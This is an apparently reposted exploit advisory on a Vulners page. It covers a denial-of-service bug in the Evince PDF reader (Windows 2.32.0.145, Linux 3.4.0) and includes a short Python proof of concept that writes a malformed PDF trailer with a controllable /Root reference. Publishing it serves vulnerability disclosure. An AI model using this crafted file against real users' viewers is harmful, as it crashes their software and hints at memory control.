Lucene search
K

Evince PDF Reader - 2.32.0.145 (Windows) and 3.4.0 (Linux) - Denial Of Service

🗓️ 03 Oct 2013 00:00:00Reported by DevaType 
zdt
 zdt
🔗 0day.today👁 23 Views

Evince PDF Reader - Denial Of Service vulnerability on Windows and Linux version 2.32.0.145 and 3.4.

Code
Advisory Information :
======================
Title : Evince 2.32.0.145 - Denial Of Service
Product : Evince pdf reader
Vendor Homepage: https://projects.gnome.org/evince/
Vulnerable Version(s) : Windows 2.32.0.145, Linux 3.4.0 and probably prior release
Tested Version : Windows 2.32.0.145, Linux 3.4.0
Tested On : Windows 7 & 8, Ubuntu 13.04
Discovered By : Deva, Securimag Team
  
Introduction :
==============
Evince is a document viewer for multiple document formats.
The goal of evince is to replace the multiple document viewers that exist on the GNOME Desktop with a single simple application.
  
- Copied from : https://projects.gnome.org/evince/
 
Proof Of Concept :
==================
You can control dereferenced address by changing value of /Root (here 42)
 
#!/usr/bin/python
 
pdf = """trailer
<<
/Size 1337
/Root 42 0 R
>>
startxref
1
%%EOF
"""
  
filename = "EvincePoC.pdf"
file = open(filename,"w")
file.writelines(pdf)
file.close()

#  0day.today [2017-12-31]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation